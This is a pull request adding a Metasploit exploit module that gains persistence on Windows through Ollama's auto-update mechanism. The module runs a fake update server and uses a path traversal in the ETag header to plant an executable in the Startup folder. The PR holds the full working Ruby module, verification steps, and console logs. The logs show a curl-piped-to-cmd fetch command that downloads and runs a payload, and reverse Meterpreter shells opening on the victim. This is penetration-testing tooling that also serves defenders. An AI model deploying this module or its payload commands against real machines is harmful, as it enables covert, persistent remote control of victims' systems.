### PR TITLE
ollama auto update persistence

### DIFF
--- a/documentation/modules/exploit/windows/persistence/ollama_auto_update.md
+++ b/documentation/modules/exploit/windows/persistence/ollama_auto_update.md
@@ -1,0 +1,143 @@
+## Vulnerable Application
+
+Ollama for Windows versions 0.12.10 through 0.22.1 are vulnerable to a
+path traversal attack (CVE-2026-42249) in the auto-update download mechanism,
+combined with a completely absent signature verification function
+(CVE-2026-42248). Payloads are written to the startup folder
+and executed at next login.
+
+> Ollama 0.22.0 [download](https://github.com/ollama/ollama/releases/download/v0.22.0/OllamaSetup.exe)
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get a session
+4. Do: `use exploit/windows/persistence/ollama_auto_update`
+5. Do: `set srvhost [IP]`
+6. DO: `set session [#]`
+7. Do: `set payload [payload]`
+8. Do: `run`
+9. Do: logout and log back in
+10. You should get a shell.
+
+## Options
+
+### MODIFY_HOSTS
+
+Add ollama.com entry to HOSTS file instead of (or in addition to) setx. Defaults to `false`
+
+### BASE_PATH
+
+Base URI path for the fake update server. Defaults to `/`
+
+### Ollama 0.22.0 on Windows 10 22H2+
+
+Original Shell
+
+```
+resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/home/h00die/.msf4/msfconsole.rc)> setg payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (/home/h00die/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload windows/meterpreter/reverse_tcp
+resource (/home/h00die/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/home/h00die/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/home/h00die/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/home/h00die/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/home/h00die/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/home/h00die/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/wOmdFrrym6hYB_VUkWOR6A & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Starting persistent handler(s)...
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /wOmdFrrym6hYB_VUkWOR6A
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450 
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Client 2.2.2.2 requested /wOmdFrrym6hYB_VUkWOR6A
+[*] Sending payload to 2.2.2.2 (curl/8.13.0)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50481) at 2026-05-07 09:52:30 -0400
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: DESKTOP-3PTMHF3\h00die
+meterpreter > sysinfo
+Computer        : DESKTOP-3PTMHF3
+OS              : Windows 10 22H2+ (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/ollama_auto_update
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/ollama_auto_update) > set srvhost 1.1.1.1
+srvhost => 1.1.1.1
+msf exploit(windows/persistence/ollama_auto_update) > set session 1
+session => 1
+msf exploit(windows/persistence/ollama_auto_update) > set payload payload/windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/ollama_auto_update) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/ollama_auto_update) > [*] Running automatic check ("set AutoCheck false" to disable)
+[*] Ollama version detected: 0.22.0
+[+] The target appears to be vulnerable. Ollama 0.22.0 is vulnerable
+[*] Starting fake update server on 1.1.1.1:8080
+[*] Using URL: http://1.1.1.1:8080/
+[+] OLLAMA_UPDATE_URL set via setx: http://1.1.1.1:8080/api/update
+[*] Payload will land at: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OllamaSetup.exe
+[*] Waiting for Ollama background update poller to fire...
+[*] Meterpreter-compatible Cleanup RC file: /home/h00die/.msf4/logs/persistence/DESKTOP-3PTMHF3_20260507.5645/DESKTOP-3PTMHF3_20260507.5645.rc
+```
+
+Startup ollama to force an update recheck
+
+```
+[*] GET /api/update?arch=amd64&nonce=TX6qhxzhNDergpMBL_KrhQ&os=windows&ts=1778162259&version=0.22.0
+[*] Update check received (client 0.22.0) — advertising 0.22.1
+[*] HEAD /download/OllamaSetup.exe
+[*] GET /download/OllamaSetup.exe
+[+] Payload served as ../../../Roaming/Microsoft/Windows/Start Menu/Programs/Startup\OllamaSetup.exe — will execute silently at next user login
+```
+
+Logoff and back in
+
+```
+[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+[*] Sending stage (248902 bytes) to 2.2.2.2
+[*] GET /api/update?arch=amd64&nonce=vu7kFAngD_HsykSt32enwQ&os=windows&ts=1778162303&version=0.22.0
+[*] Update check received (client 0.22.0) — advertising 0.22.1
+[*] HEAD /download/OllamaSetup.exe
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50730) at 2026-05-07 09:58:25 -0400
+
+msf exploit(windows/persistence/ollama_auto_update) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: DESKTOP-3PTMHF3\h00die
+meterpreter > 
+```

--- a/modules/exploits/windows/persistence/ollama_auto_update.rb
+++ b/modules/exploits/windows/persistence/ollama_auto_update.rb
@@ -1,0 +1,206 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Local::Persistence
+  include Msf::Post::Windows::Registry
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  HOSTS_PATH = 'C:\\Windows\\System32\\drivers\\etc\\hosts'
+  UPDATE_HOSTNAME = 'ollama.com'
+  PAYLOAD_FILENAME = 'OllamaSetup.exe'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ollama Windows Auto-Update Path Traversal Persistence',
+        'Description' => %q{
+          Ollama for Windows versions 0.12.10 through 0.22.1 are vulnerable to a
+          path traversal attack (CVE-2026-42249) in the auto-update download mechanism,
+          combined with a completely absent signature verification function
+          (CVE-2026-42248). Payloads are written to the startup folder
+          and executed at next login.
+        },
+        'Author' => [
+          'Bartłomiej Dmitruk', # Discovery and PoC
+          'h00die' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-42248'],
+          ['CVE', '2026-42249'],
+          ['URL', 'https://www.striga.ai/research/ollama-windows-auto-update-rce'],
+          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER]
+        ],
+        'Platform' => ['win'],
+        'Arch' => [ARCH_X64, ARCH_X86],
+        'SessionTypes' => ['meterpreter', 'shell'],
+        'Targets' => [
+          ['Automatic', {}]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2026-04-29',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options([
+      OptBool.new('MODIFY_HOSTS', [true, 'Add ollama.com entry to HOSTS file instead of (or in addition to) setx', false]),
+      OptString.new('BASE_PATH', [false, 'Base URI path for the fake update server.', '/'])
+    ])
+  end
+
+  def check
+    raw = cmd_exec('ollama --version')
+    return CheckCode::Unknown('ollama binary not found or returned no output') if raw.nil? || raw.strip.empty?
+
+    # "ollama version 0.21.0" or just "0.22.1"
+    version_str = raw.strip.match(/(\d+\.\d+\.\d+)/)&.captures&.first
+    return CheckCode::Unknown("Could not parse version from: #{raw.strip}") unless version_str
+
+    vprint_status("Ollama version detected: #{version_str}")
+
+    target_v = Rex::Version.new(version_str)
+    vuln_min = Rex::Version.new('0.12.10')
+    vuln_max = Rex::Version.new('0.22.1') # patched in 0.23.0, unmentioned in patch notes, but tested and is fixed
+
+    unless target_v >= vuln_min && target_v <= vuln_max
+      return CheckCode::Safe("Ollama #{version_str} is not vulnerable")
+    end
+
+    CheckCode::Appears("Ollama #{version_str} is vulnerable")
+  end
+
+  def install_persistence
+    @payload_name = PAYLOAD_FILENAME
+
+    @payload_exe = generate_payload_exe
+
+    # filepath.Join(UpdateStageDir, etag, filename) is resolved without sanitisation.
+    # UpdateStageDir = %APPDATA%\Ollama\updates = ...\AppData\Roaming\Ollama\updates
+    # Three ".." hops: updates -> Ollama -> Roaming -> AppData
+    # Then down into Roaming\Microsoft\Windows\Start Menu\Programs\Startup
+    @etag_traversal = '../../../Roaming/Microsoft/Windows/Start Menu/Programs/Startup'
+
+    configured = datastore['BASE_PATH'].to_s.strip
+    configured = '/' if configured.empty?
+    @base_path = configured.start_with?('/') ? configured : "/#{configured}"
+
+    print_status("Starting fake update server on #{Rex::Socket.to_authority(srvhost_addr, srvport)}")
+    begin
+      start_service({
+        'Uri' => {
+          'Proc' => method(:on_request_uri),
+          'Path' => @base_path
+        }
+      })
+    rescue RuntimeError => e
+      raise unless e.message.include?('already added')
+
+      # ServiceManager returned an existing server that still has this path registered
+      # from a previous run. Replace the stale handler with the current one.
+      remove_resource(@base_path)
+      add_resource({ 'Path' => @base_path, 'Proc' => method(:on_request_uri) })
+      print_status('Reusing existing HTTP service with updated handler')
+    end
+
+    url_base = @base_path == '/' ? '' : @base_path
+    update_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{url_base}/api/update"
+    configure_update_url(update_url)
+    modify_hosts_file if datastore['MODIFY_HOSTS']
+
+    print_status("Payload will land at: %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{@payload_name}")
+    print_status('Waiting for Ollama background update poller to fire...')
+  end
+
+  def on_request_uri(cli, request)
+    vprint_status("#{request.method} #{request.uri}")
+
+    path = request.uri.split('?').first
+    if path.end_with?('/api/update')
+      serve_update_check(cli, request)
+    elsif path.include?('/download/')
+      serve_payload(cli, request)
+    else
+      send_response(cli, '', { 'code' => 404 })
+    end
+  end
+
+  private
+
+  def configure_update_url(update_url)
+    # setx writes the variable permanently into HKCU\Environment — survives reboot
+    # and is visible to all future processes for this user, including the Ollama updater.
+    result = cmd_exec("setx OLLAMA_UPDATE_URL \"#{update_url}\"")
+    if result =~ /SUCCESS/i
+      print_good("OLLAMA_UPDATE_URL set via setx: #{update_url}")
+      @clean_up_rc << "execute -f cmd.exe -a '/c reg delete HKCU\\\\Environment /v OLLAMA_UPDATE_URL /f' -H\n"
+    else
+      print_warning("setx may have failed (#{result.strip}) — try setting OLLAMA_UPDATE_URL manually")
+    end
+  end
+
+  def modify_hosts_file
+    current = read_file(HOSTS_PATH) || ''
+    entry = "#{srvhost_addr}\t#{UPDATE_HOSTNAME}"
+
+    if current.include?(UPDATE_HOSTNAME)
+      print_warning("#{UPDATE_HOSTNAME} already present in HOSTS file — skipping")
+      return
+    end
+
+    updated = current.rstrip + "\r\n#{entry}\r\n"
+    write_file(HOSTS_PATH, updated)
+    print_good("Added '#{entry}' to #{HOSTS_PATH}")
+    @clean_up_rc << "execute -f cmd.exe -a '/c for /f \"eol=# tokens=*\" %i in (#{HOSTS_PATH}) do @echo %i | findstr /v /i #{UPDATE_HOSTNAME} >> #{HOSTS_PATH}.tmp & move /y #{HOSTS_PATH}.tmp #{HOSTS_PATH}' -H\n"
+  end
+
+  def serve_update_check(cli, request)
+    client_version = request.qstring['version']
+    fake_version = bump_patch(client_version) || '0.22.1'
+    url_base = @base_path == '/' ? '' : @base_path
+    download_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{url_base}/download/OllamaSetup.exe"
+    body = { 'version' => fake_version, 'url' => download_url }.to_json
+    print_status("Update check received (client #{client_version}) — advertising #{fake_version}")
+    send_response(cli, body, {
+      'Content-Type' => 'application/json',
+      'code' => 200
+    })
+  end
+
+  def bump_patch(version_str)
+    return nil unless version_str&.match?(/^\d+\.\d+\.\d+$/)
+
+    major, minor, patch = version_str.split('.').map(&:to_i)
+    "#{major}.#{minor}.#{patch + 1}"
+  end
+
+  def serve_payload(cli, request)
+    headers = {
+      'Content-Type' => 'application/octet-stream',
+      'Content-Length' => @payload_exe.length.to_s,
+      'ETag' => @etag_traversal,
+      'Content-Disposition' => "attachment; filename=\"#{@payload_name}\""
+    }
+
+    if request.method == 'HEAD'
+      send_response(cli, '', headers.merge('code' => 200))
+    else
+      send_response(cli, @payload_exe, headers.merge('code' => 200))
+      print_good("Payload served as #{@etag_traversal}/#{@payload_name} — will execute silently at next user login")
+    end
+  end
+end

--- a/modules/exploits/windows/persistence/ollama_auto_update.rb
+++ b/modules/exploits/windows/persistence/ollama_auto_update.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'Platform' => ['win'],
         'Arch' => [ARCH_X64, ARCH_X86],
-        'SessionTypes' => ['meterpreter', 'shell'],
+        'SessionTypes' => ['meterpreter'],
         'Targets' => [
           ['Automatic', {}]
         ],

--- a/modules/exploits/windows/persistence/ollama_auto_update.rb
+++ b/modules/exploits/windows/persistence/ollama_auto_update.rb
@@ -163,7 +163,10 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     updated = current.rstrip + "\r\n#{entry}\r\n"
-    write_file(HOSTS_PATH, updated)
+    unless write_file(HOSTS_PATH, updated)
+      fail_with(Failure::NoAccess, "Failed to update #{HOSTS_PATH}; administrative privileges may be required")
+    end
+
     print_good("Added '#{entry}' to #{HOSTS_PATH}")
     @clean_up_rc << "execute -f cmd.exe -a '/c for /f \"eol=# tokens=*\" %i in (#{HOSTS_PATH}) do @echo %i | findstr /v /i #{UPDATE_HOSTNAME} >> #{HOSTS_PATH}.tmp & move /y #{HOSTS_PATH}.tmp #{HOSTS_PATH}' -H\n"
   end

--- a/modules/exploits/windows/persistence/ollama_auto_update.rb
+++ b/modules/exploits/windows/persistence/ollama_auto_update.rb
@@ -40,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Local
           ['CVE', '2026-42248'],
           ['CVE', '2026-42249'],
           ['URL', 'https://www.striga.ai/research/ollama-windows-auto-update-rce'],
-          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER]
+          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION]
         ],
         'Platform' => ['win'],
         'Arch' => [ARCH_X64, ARCH_X86],

--- a/modules/exploits/windows/persistence/ollama_auto_update.rb
+++ b/modules/exploits/windows/persistence/ollama_auto_update.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -58,13 +60,13 @@ class MetasploitModule < Msf::Exploit::Local
     )
 
     register_options([
-      OptBool.new('MODIFY_HOSTS', [true, 'Add ollama.com entry to HOSTS file instead of (or in addition to) setx', false]),
+      OptBool.new('MODIFY_HOSTS', [true, 'Also add an ollama.com entry to the HOSTS file (setx always runs regardless)', false]),
       OptString.new('BASE_PATH', [false, 'Base URI path for the fake update server.', '/'])
     ])
   end
 
   def check
-    raw = cmd_exec('ollama --version')
+    raw = create_process('ollama', args: ['--version'])
     return CheckCode::Unknown('ollama binary not found or returned no output') if raw.nil? || raw.strip.empty?
 
     # "ollama version 0.21.0" or just "0.22.1"
@@ -124,6 +126,12 @@ class MetasploitModule < Msf::Exploit::Local
 
     print_status("Payload will land at: %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{@payload_name}")
     print_status('Waiting for Ollama background update poller to fire...')
+
+    report_vuln(
+      host: session.session_host,
+      name: 'Ollama Windows Auto-Update Path Traversal Persistence',
+      refs: references
+    )
   end
 
   def on_request_uri(cli, request)
@@ -144,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Local
   def configure_update_url(update_url)
     # setx writes the variable permanently into HKCU\Environment — survives reboot
     # and is visible to all future processes for this user, including the Ollama updater.
-    result = cmd_exec("setx OLLAMA_UPDATE_URL \"#{update_url}\"")
+    result = create_process('setx', args: ['OLLAMA_UPDATE_URL', update_url])
     if result =~ /SUCCESS/i
       print_good("OLLAMA_UPDATE_URL set via setx: #{update_url}")
       @clean_up_rc << "execute -f cmd.exe -a '/c reg delete HKCU\\\\Environment /v OLLAMA_UPDATE_URL /f' -H\n"
@@ -154,6 +162,11 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def modify_hosts_file
+    unless file_exist?(HOSTS_PATH)
+      print_warning("HOSTS file not found at #{HOSTS_PATH} — skipping hosts modification")
+      return
+    end
+
     current = read_file(HOSTS_PATH) || ''
     entry = "#{srvhost_addr}\t#{UPDATE_HOSTNAME}"
 
@@ -165,12 +178,12 @@ class MetasploitModule < Msf::Exploit::Local
     updated = current.rstrip + "\r\n#{entry}\r\n"
     write_file(HOSTS_PATH, updated)
     print_good("Added '#{entry}' to #{HOSTS_PATH}")
-    @clean_up_rc << "execute -f cmd.exe -a '/c for /f \"eol=# tokens=*\" %i in (#{HOSTS_PATH}) do @echo %i | findstr /v /i #{UPDATE_HOSTNAME} >> #{HOSTS_PATH}.tmp & move /y #{HOSTS_PATH}.tmp #{HOSTS_PATH}' -H\n"
+    @clean_up_rc << "execute -f cmd.exe -a '/c findstr /v /i /c:\"#{entry}\" \"#{HOSTS_PATH}\" > \"#{HOSTS_PATH}.tmp\" & move /y \"#{HOSTS_PATH}.tmp\" \"#{HOSTS_PATH}\"' -H\n"
   end
 
   def serve_update_check(cli, request)
     client_version = request.qstring['version']
-    fake_version = bump_patch(client_version) || '0.22.1'
+    fake_version = client_version ? Rex::Version.new(client_version).bump.to_s : '0.23'
     url_base = @base_path == '/' ? '' : @base_path
     download_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{url_base}/download/OllamaSetup.exe"
     body = { 'version' => fake_version, 'url' => download_url }.to_json
@@ -179,13 +192,6 @@ class MetasploitModule < Msf::Exploit::Local
       'Content-Type' => 'application/json',
       'code' => 200
     })
-  end
-
-  def bump_patch(version_str)
-    return nil unless version_str&.match?(/^\d+\.\d+\.\d+$/)
-
-    major, minor, patch = version_str.split('.').map(&:to_i)
-    "#{major}.#{minor}.#{patch + 1}"
   end
 
   def serve_payload(cli, request)


### PR DESCRIPTION
fixes #21419

This PR takes advantage of a directory traversal vulnerability (CVE-2026-42249) and a lack of signature verification on windows (CVE-2026-42248) to establish persistence through Ollama's update mechanism. Vulnerable versions are 0.12.10 through 0.22.1 (inclusive). While the patch notes for 0.23.0 don't mention anything security or cve related, testing showed its been patched.

## Verification

1. Install the application
2. Start msfconsole
3. Get a session
4. Do: `use exploit/windows/persistence/ollama_auto_update`
5. Do: `set srvhost [IP]`
6. DO: `set session [#]`
7. Do: `set payload [payload]`
8. Do: `run`
9. Do: logout and log back in
10. You should get a shell.
